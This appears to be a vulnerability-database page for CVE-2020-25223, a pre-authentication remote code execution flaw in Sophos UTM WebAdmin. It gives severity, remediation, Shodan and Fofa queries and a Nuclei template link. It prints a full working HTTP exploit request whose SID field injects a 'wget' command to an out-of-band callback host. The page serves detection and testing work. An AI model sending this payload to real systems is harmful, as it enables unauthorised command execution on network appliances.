🔙 목록으로 돌아가기

CVE-2020-25223: Sophos UTM Preauth - Remote Code Execution

TitleSophos UTM Preauth - Remote Code Execution
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.
RemediationApply the latest security patches provided by Sophos to mitigate the vulnerability.
CVSS Score9.8
EPSS Score0.94415
CVE IDCVE-2020-25223
CWE IDCWE-78
Shodan Queryhttp.title:"securepoint utm"
Fofa Querytitle="securepoint utm"
Tags cve cve2020 sophos rce oast unauth kev vkev vuln

🔍 Vulnerability Description

Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.

🌐 HTTP Request

POST /var HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Length: 262
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/json; charset=UTF-8
Origin: http://www.victim.com
Referer: http://www.victim.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Prototype-Version: 1.5.1.1
X-Requested-With: XMLHttpRequest

{"objs": [{"FID": "init"}], "SID": "|wget http://d5jopf9le0o48v0b2ak06sarzmjkewuei.oast.site|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-25223.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-25223.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A